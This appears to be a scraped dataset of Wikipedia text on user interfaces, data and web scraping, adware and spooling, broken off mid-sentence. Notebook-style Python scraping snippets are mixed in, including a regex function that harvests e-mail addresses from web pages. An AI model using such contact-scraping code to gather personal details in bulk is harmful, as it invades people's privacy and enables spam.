For example, a Smell-O-Vision is a 3 sense (3S) Standard CUI with visual display, sound and smells; when virtual reality interfaces interface with smells and touch it is said to be a 4 sense (4S) virtual reality interface; and when augmented reality interfaces interface with smells and touch it is said to be a 4 sense (4S) augmented reality interface. The user interface or human machine interface is the part of the machine that handles the human machine interaction. Membrane switches, rubber keypads and touchscreens are examples of the physical part of the Human Machine Interface which we can see and touch. 1 In complex systems, the human machine interface is typically computerized. The term human computer interface refers to this kind of system. In the context of computing, the term typically extends as well to the software dedicated to control the physical elements used for human computer interaction. The engineering of human machine interfaces is enhanced by considering ergonomics (human factors). The corresponding disciplines are human factors engineering (HFE) and usability engineering (UE) which is part of systems engineering. Tools used for incorporating human factors in the interface design are developed based on knowledge of computer science, such as computer graphics, operating systems, programming languages. Nowadays, we use the expression graphical user interface for human machine interface on computers, as nearly all of them are now using graphics. citation needed Multimodal interfaces allow users to interact using more than one modality of user input. 2 There is a difference between a user interface and an operator interface or a human machine interface (HMI). In science fiction, HMI is sometimes used to refer to what is better described as a direct neural interface. However, this latter usage is seeing increasing application in the real-life use of (medical) prostheses—the artificial extension that replaces a missing body part (e.g., cochlear implants). 7 8 In some circumstances, computers might observe the user and react according to their actions without specific commands. A means of tracking parts of the body is required, and sensors noting the position of the head, direction of gaze and so on have been used experimentally. This is particularly relevant to immersive interfaces. 9 10 The history of user interfaces can be divided into the following phases according to the dominant type of user interface: In the batch era, computing power was extremely scarce and expensive. User interfaces were rudimentary. Users had to accommodate computers rather than the other way around; user interfaces were considered overhead, and software was designed to keep the processor at maximum utilization with as little overhead as possible. The input side of the user interfaces for batch machines was mainly punched cards or equivalent media like paper tape. The output side added line printers to these media. With the limited exception of the system operator's console, human beings did not interact with batch machines in real time at all. Submitting a job to a batch machine involved first preparing a deck of punched cards that described a program and its dataset. The program cards were not punched on the computer itself but on keypunches, specialized, typewriter-like machines that were notoriously bulky, unforgiving, and prone to mechanical failure. 
The software interface was similarly unforgiving, with very strict syntaxes designed to be parsed by the smallest possible compilers and interpreters. Once the cards were punched, one would drop them in a job queue and wait. Eventually, operators would feed the deck to the computer, perhaps mounting magnetic tapes to supply another dataset or helper software. The job would generate a printout, containing final results or an abort notice with an attached error log. Successful runs might also write a result on magnetic tape or generate some data cards to be used in a later computation. The turnaround time for a single job often spanned entire days. If one was very lucky, it might be hours; there was no real-time response. But there were worse fates than the card queue; some computers required an even more tedious and error-prone process of toggling in programs in binary code using console switches. The very earliest machines had to be partly rewired to incorporate program logic into themselves, using devices known as plugboards. Early batch systems gave the currently running job the entire computer; program decks and tapes had to include what we would now think of as operating system code to talk to I O devices and do whatever other housekeeping was needed. Midway through the batch period, after 1957, various groups began to experiment with so-called "load-and-go" systems. These used a monitor program which was always resident on the computer. Programs could call the monitor for services. Another function of the monitor was to do better error checking on submitted jobs, catching errors earlier and more intelligently and generating more useful feedback to the users. Thus, monitors represented the first step towards both operating systems and explicitly designed user interfaces. Command-line interfaces (CLIs) evolved from batch monitors connected to the system console. Their interaction model was a series of request-response transactions, with requests expressed as textual commands in a specialized vocabulary. Latency was far lower than for batch systems, dropping from days or hours to seconds. Accordingly, command-line systems allowed the user to change their mind about later stages of the transaction in response to real-time or near-real-time feedback on earlier results. Software could be exploratory and interactive in ways not possible before. But these interfaces still placed a relatively heavy mnemonic load on the user, requiring a serious investment of effort and learning time to master. 11 The earliest command-line systems combined teleprinters with computers, adapting a mature technology that had proven effective for mediating the transfer of information over wires between human beings. Teleprinters had originally been invented as devices for automatic telegraph transmission and reception; they had a history going back to 1902 and had already become well-established in newsrooms and elsewhere by 1920. In reusing them, economy was certainly a consideration, but psychology and the rule of least surprise mattered as well; teleprinters provided a point of interface with the system that was familiar to many engineers and users. The widespread adoption of video-display terminals (VDTs) in the mid 1970s ushered in the second phase of command-line systems. These cut latency further, because characters could be thrown on the phosphor dots of a screen more quickly than a printer head or carriage can move. 
They helped quell conservative resistance to interactive programming by cutting ink and paper consumables out of the cost picture, and were to the first TV generation of the late 1950s and 60s even more iconic and comfortable than teleprinters had been to the computer pioneers of the 1940s. Just as importantly, the existence of an accessible screen—a two-dimensional display of text that could be rapidly and reversibly modified—made it economical for software designers to deploy interfaces that could be described as visual rather than textual. The pioneering applications of this kind were computer games and text editors; close descendants of some of the earliest specimens, such as rogue(6), and vi(1), are still a live part of Unix tradition. In 1985, with the beginning of Microsoft Windows and other graphical user interfaces, IBM created what is called the Systems Application Architecture (SAA) standard which include the Common User Access (CUA) derivative. CUA successfully created what we know and use today in Windows, and most of the more recent DOS or Windows Console Applications will use that standard as well. This defined that a pulldown menu system should be at the top of the screen, status bar at the bottom, shortcut keys should stay the same for all common functionality (F2 to Open for example would work in all applications that followed the SAA standard). This greatly helped the speed at which users could learn an application so it caught on quick and became an industry standard. 12 Primary methods used in the interface design include prototyping and simulation. Typical human machine interface design consists of the following stages: interaction specification, interface software specification and prototyping: In broad terms, interfaces generally regarded as user friendly, efficient, intuitive, etc. are typified by one or more particular qualities. For the purpose of example, a non-exhaustive list of such characteristics follows: The principle of least astonishment (POLA) is a general principle in the design of all kinds of interfaces. It is based on the idea that human beings can only pay full attention to one thing at one time, 20 leading to the conclusion that novelty should be minimized. If an interface is used persistently, the user will unavoidably develop habits for using the interface. The designer's role can thus be characterized as ensuring the user forms good habits. If the designer is experienced with other interfaces, they will similarly develop habits, and often make unconscious assumptions regarding how the user will interact with the interface. 20 21 Peter Morville of Google designed the User Experience Honeycomb framework in 2004 when leading operations in user interface design. The framework was created to guide user interface design. It would act as a guideline for many web development students for a decade. 23 |
400 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-6 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
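The passage above describes modern screen scraping as capturing bitmap data from the screen and running it through an OCR engine. The sketch below assumes the third-party Pillow and pytesseract packages plus a locally installed Tesseract binary, none of which appear earlier in this notebook; the capture region and the price pattern are illustrative only.
# Hedged sketch of bitmap-plus-OCR screen scraping, as described above.
# Assumes: pip install pillow pytesseract, plus a local Tesseract install.
import re
from PIL import ImageGrab     # grabs (part of) the current display as a bitmap
import pytesseract            # Python wrapper around the Tesseract OCR engine

def scrape_screen_region(bbox=(0, 0, 800, 600)):
    image = ImageGrab.grab(bbox=bbox)            # capture a region of the screen
    text = pytesseract.image_to_string(image)    # OCR the bitmap back into text
    # Example post-processing: pull out anything that looks like a dollar price
    return re.findall(r"\$\d[\d,]*\.?\d*", text)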
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
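Report mining as described above often comes down to parsing a fixed-width text report that a legacy system "printed" to a spool file. A minimal sketch with pandas (already imported at the top of this notebook); the file name, column widths and header length are invented for the example.
import pandas as pd
def mine_report(path="monthly_sales.spool"):
    # read_fwf parses reports laid out in fixed-width columns for a human reader
    df = pd.read_fwf(path,
                     colspecs=[(0, 10), (10, 40), (40, 52)],   # invented column layout
                     names=["date", "customer", "amount"],
                     skiprows=3)                               # skip the printed report header
    # Strip thousands separators and coerce the amount column to numbers
    df["amount"] = pd.to_numeric(df["amount"].astype(str).str.replace(",", ""), errors="coerce")
    return df.dropna(subset=["amount"])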
401 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Adware | Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process. The software may generate two types of revenue: one is for the display of the advertisement and another on a "pay-per-click" basis, if the user clicks on the advertisement. Some advertisements also act as spyware, 1 collecting and reporting data about the user, to be sold or used for targeted advertising or user profiling. The software may implement advertisements in a variety of ways, including a static box display, a banner display, a full screen, a video, a pop-up ad or in some other form. All forms of advertising carry health, ethical, privacy and security risks for users. The 2003 Microsoft Encyclopedia of Security and some other sources use the term "adware" differently: "any software that installs itself on your system without your knowledge and displays advertisements when the user browses the Internet", 2 i.e., a form of malware. Some software developers offer their software free of charge, and rely on revenue from advertising to recoup their expenses and generate income. Some also offer a version of the software at a fee without advertising. In legitimate software, the advertising functions are integrated into or bundled with the program. Adware is usually seen by the developer as a way to recover development costs, and generate revenue. In some cases, the developer may provide the software to the user free of charge or at a reduced price. The income derived from presenting advertisements to the user may allow or motivate the developer to continue to develop, maintain and upgrade the software product. 3 The use of advertising-supported software in business is becoming increasingly popular, with a third of IT and business executives in a 2007 survey by McKinsey Company planning to be using ad-funded software within the following two years. 4 Advertisement-funded software is also one of the business models for open-source software. Some software is offered in both an advertising-supported mode and a paid, advertisement-free mode. The latter is usually available by an online purchase of a license or registration code for the software that unlocks the mode, or the purchase and download of a separate version of the software. a Some software authors offer advertising-supported versions of their software as an alternative option to business organizations seeking to avoid paying large sums for software licenses, funding the development of the software with higher fees for advertisers. 8 Examples of advertising-supported software include Adblock Plus ("Acceptable Ads"), 9 the Windows version of the Internet telephony application Skype, 10 and the Amazon Kindle 3 family of e-book readers, which has versions called "Kindle with Special Offers" that display advertisements on the home page and in sleep mode in exchange for substantially lower pricing. 11 In 2012, Microsoft and its advertising division, Microsoft Advertising, b announced that Windows 8, the major release of the Microsoft Windows operating system, would provide built-in methods for software authors to use advertising support as a business model. 13 14 The idea had been considered since as early as 2005. 15 Most editions of Windows 10 include adware by default. 
16 Support by advertising is a popular business model of software as a service (SaaS) on the Web. Notable examples include the email service Gmail 3 17 and other Google Workspace products (previously called Google Apps and G Suite), 4 and the social network Facebook. 18 19 Microsoft has also adopted the advertising-supported model for many of its social software SaaS offerings. 20 The Microsoft Office Live service was also available in an advertising-supported mode. 4 In the view of Federal Trade Commission staff, 21 there appears to be general agreement that software should be considered "spyware" only if it is downloaded or installed on a computer without the user's knowledge and consent. However, unresolved issues remain concerning how, what, and when consumers need to be told about software installed on their computers. For instance, distributors often disclose in an end-user license agreement that there is additional software bundled with primary software, but some participants did not view such disclosure as sufficient to infer consent. Much of the discussion on the topic involves the idea of informed consent, the assumption being that this standard eliminates any ethical issues with any given software's behavior. However, if a majority of important software, websites and devices were to adopt similar behavior and only the standard of informed consent is used, then logically a user's only recourse against that behavior would become not using a computer. The contract would become an ultimatum—agree or be ostracized from the modern world. This is a form of psychological coercion and presents an ethical problem with using implied or inferred consent as a standard. There are notable similarities between this situation and binding arbitration clauses which have become inevitable in contracts in the United States. Furthermore, certain forms and strategies of advertising have been shown to lead to psychological harm, especially in children. One example is childhood eating disorders—several studies have reported a positive association between exposure to beauty and fashion magazines and an increased level of weight concerns or eating disorder symptoms in girls. 22 The term adware is frequently used to describe a form of malware (malicious software) 23 24 which presents unwanted advertisements to the user of a computer. 25 26 The advertisements produced by adware are sometimes in the form of a pop-up, sometimes in an "unclosable window", and sometimes injected into web pages. 27 28 When the term is used in this way, the severity of its implication varies. While some sources rate adware only as an "irritant", 29 others classify it as an "online threat" 30 or even rate it as seriously as computer viruses and trojans. 31 The precise definition of the term in this context also varies. c Adware that observes the computer user's activities without their consent and reports it to the software's author is called spyware. 33 Adwares may collect the personal information of the user, causing privacy concerns. 34 However, most adware operates legally and some adware manufacturers have even sued antivirus companies for blocking adware. 35 Programs have been developed to detect, quarantine, and remove advertisement-displaying malware, including Ad-Aware, Malwarebytes' Anti-Malware, Spyware Doctor and Spybot Search Destroy. In addition, almost all commercial antivirus software currently detect adware and spyware, or offer a separate detection module. 
36 A new wrinkle is adware that disables anti-malware and virus protection; technical remedies are available. 35 Adware has also been discovered in certain low-cost Android devices, particularly those made by small Chinese firms running on Allwinner systems-on-chip. There are even cases where adware code is embedded deep into files stored on the system and boot partitions, and removal involves extensive (and complex) modifications to the firmware. 37 In recent years, machine-learning-based systems have been implemented to detect malicious adware on Android devices by examining features in the flow of network traffic. 38 |
402 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Spooling | In computing, spooling is a specialized form of multi-programming for the purpose of copying data between different devices. In contemporary systems, it is usually used for mediating between a computer application and a slow peripheral, such as a printer. Spooling allows programs to "hand off" work to be done by the peripheral and then proceed to other tasks, or to not begin until input has been transcribed. A dedicated program, the spooler, maintains an orderly sequence of jobs for the peripheral and feeds it data at its own rate. Conversely, for slow input peripherals, such as a card reader, a spooler can maintain a sequence of computational jobs waiting for data, starting each job when all of the relevant input is available; see batch processing. The spool itself refers to the sequence of jobs, or the storage area where they are held. In many cases, the spooler is able to drive devices at their full rated speed with minimal impact on other processing. Spooling is a combination of buffering and queueing. Nowadays, the most common use of spooling is printing: documents formatted for printing are stored in a queue at the speed of the computer, then retrieved and printed at the speed of the printer. Multiple processes can write documents to the spool without waiting, and can then perform other tasks, while the "spooler" process operates the printer. 1 For example, when a large organization prepares payroll cheques, the computation takes only a few minutes or even seconds, but the printing process might take hours. If the payroll program printed cheques directly, it would be unable to proceed to other computations until all the cheques were printed. Similarly, before spooling was added to PC operating systems, word processors were unable to do anything else, including interact with the user, while printing. Spooler or print management software often includes a variety of related features, such as allowing priorities to be assigned to print jobs, notifying users when their documents have been printed, distributing print jobs among several printers, selecting appropriate paper for each document, etc. A print server applies spooling techniques to allow many computers to share the same printer or group of printers. Print spoolers can be configured to add a banner page, also called a burst page, job sheet, or printer separator, to the beginning and end of each document and job. These separate documents from each other, identify each document (e.g. with its title) and often also state who printed it (e.g. by username or job name). Banner pages are valuable in office environments where many people share a small number of printers. They are also valuable when a single job can produce multiple documents. Depending on the configuration, banner pages might be generated on each client computer, on a centralized print server, or by the printer itself. On printers using fanfold continuous forms, a leading banner page would often be printed twice, so that one copy would always be face-up when the jobs were separated. The page might include lines printed over the fold, which would be visible along the edge of a stack of printed output, allowing the operator to easily separate the jobs. Some systems would also print a banner page at the end of each job, assuring users that they had collected all of their printout. 
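As a toy illustration of the spooling idea described above (not how any real operating system implements it), a queue can decouple fast producers from a slow device: jobs are enqueued immediately and a background worker drains them at the device's own pace. This uses only the Python standard library:

import queue
import threading
import time

print_queue = queue.Queue()   # the "spool": an ordered backlog of jobs

def spooler():
    """Worker that feeds the slow device at its own rate."""
    while True:
        job = print_queue.get()
        if job is None:            # sentinel value shuts the spooler down
            break
        time.sleep(1)              # stand-in for the slow peripheral
        print(f"printed: {job}")
        print_queue.task_done()

worker = threading.Thread(target=spooler, daemon=True)
worker.start()

# Producers hand off work instantly and move on to other tasks.
for doc in ["cheque_001", "cheque_002", "cheque_003"]:
    print_queue.put(doc)

print_queue.join()       # wait until every spooled job has been printed
print_queue.put(None)    # stop the worker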
Spooling is also used to mediate access to punched card readers and punches, magnetic tape drives, and other slow, sequential I/O devices. It allows the application to run at the speed of the CPU while operating peripheral devices at their full rated speed. A batch processing system uses spooling to maintain a queue of ready-to-run tasks, which can be started as soon as the system has the resources to process them. Some store-and-forward messaging systems, such as uucp, used "spool" to refer to their inbound and outbound message queues, and this terminology is still found in the documentation for email and Usenet software. Peripheral devices have always been much slower than core processing units. This was an especially severe problem for early mainframes. For example, a job which read punched cards or generated printed output directly was forced to run at the speed of the slow mechanical devices. The first spooling programs, such as IBM's "SPOOL System" (7070-IO-076), copied data from punched cards to magnetic tape, and from tape back to punched cards and printers. Hard disks, which offered faster I/O speeds and support for random access, started to replace the use of magnetic tape for spooling in the middle 1960s, and by the 1970s had largely replaced it altogether. Because the unit record equipment on IBM mainframes of the early 1960s was slow, it was common for larger systems to use a small offline computer such as an IBM 1401 instead of spooling. The term "spool" may originate with the Simultaneous Peripheral Operations On-Line 2 3 (SPOOL) software; 4 this derivation is uncertain, however. Simultaneous peripheral operations on-line may be a backronym. 5 Another explanation is that it refers to "spools" or reels of magnetic tape, although “spool” is an uncommon usage. |
403 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Australia | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
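The contact-scraping use case mentioned above (copying e-mail addresses off a page into a list) can be sketched with requests plus a simple regular expression. The URL below is a placeholder, and the pattern is deliberately loose; it is an illustration rather than a production-quality extractor:

import re
import requests

# A deliberately simple pattern: it will miss some valid addresses
# and match some invalid ones, but it illustrates the idea.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def scrape_emails(url):
    """Fetch a page and return the unique e-mail addresses found in it."""
    html = requests.get(url, timeout=10).text
    return sorted(set(EMAIL_RE.findall(html)))

# Placeholder URL, for illustration only:
# print(scrape_emails("https://example.com/contact"))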
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or the regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical-specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 A newer approach uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
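The DOM-tree approach described above can be sketched with lxml, which parses a page and lets XPath expressions pull out nodes. Note the assumptions: lxml is not installed in the setup cell at the top of this notebook (it would need pip install lxml), the URL is a placeholder, and the XPath targets a made-up page layout:

import requests
from lxml import html  # assumed extra dependency: pip install lxml

def extract_titles(url):
    """Parse a page into a DOM tree and pull out nodes with XPath.

    The XPath below assumes articles are marked up as
    h2 elements with class "title" wrapping a link, which is purely
    illustrative; real pages need their own expressions.
    """
    page = requests.get(url, timeout=10)
    tree = html.fromstring(page.content)
    return [
        {"title": a.text_content().strip(), "link": a.get("href")}
        for a in tree.xpath('//h2[@class="title"]/a')
    ]

# Placeholder URL, for illustration only:
# print(extract_titles("https://example.com/blog"))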
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include the following. BeautifulSoup: a Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: an open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: a platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: an AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
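Of the tools listed above, BeautifulSoup is already used elsewhere in this notebook; Scrapy structures the same work as a spider class instead. Below is a minimal, hypothetical spider sketch: quotes.toscrape.com is a public practice site commonly used in scraping tutorials, the CSS selectors assume that site's markup, and running it requires pip install scrapy followed by scrapy runspider quotes_spider.py:

import scrapy  # assumed extra dependency: pip install scrapy

class QuotesSpider(scrapy.Spider):
    """Minimal spider: crawl listing pages and yield one item per quote."""
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]  # public practice site

    def parse(self, response):
        # The CSS selectors below assume the practice site's markup.
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow pagination links, if any.
        next_page = response.css("li.next a::attr(href)").get()
        if next_page is not None:
            yield response.follow(next_page, callback=self.parse)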
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the 